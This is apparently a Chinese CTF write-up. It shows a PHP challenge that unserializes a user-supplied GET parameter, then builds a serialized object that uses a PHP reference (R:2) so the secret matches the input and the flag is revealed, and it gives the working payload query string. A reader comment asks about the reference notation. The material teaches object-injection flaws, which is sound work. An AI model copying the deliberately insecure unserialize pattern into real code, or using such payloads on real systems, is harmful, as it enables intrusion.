<?php
#GOAL: get the secret;
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);
}
$o = unserialize($pass);
if ($o) {
$o->secret = "flag{I'm xxxxxxxxxxxxxxxxxxxxxxxxxxxx}";
if ($o->secret === $o->enter)
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
}
?>
可以看到存在反序列化$o = unserialize($pass);
需要对pass传参,一个序列化的对象,使其能够满足$o->secret === $o->enter
<?php
class just4fun {
var $enter;
var $secret;
}
$pass = new just4fun();
$pass->enter = &$pass->secret;
?>
?pass=O:8:"just4fun":2:{s:5:"enter";N;s:6:"secret";R:2;}
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
elephant2023
发表于 2023-12-11
R:2 是怎么来的啊
评论列表
加载数据中...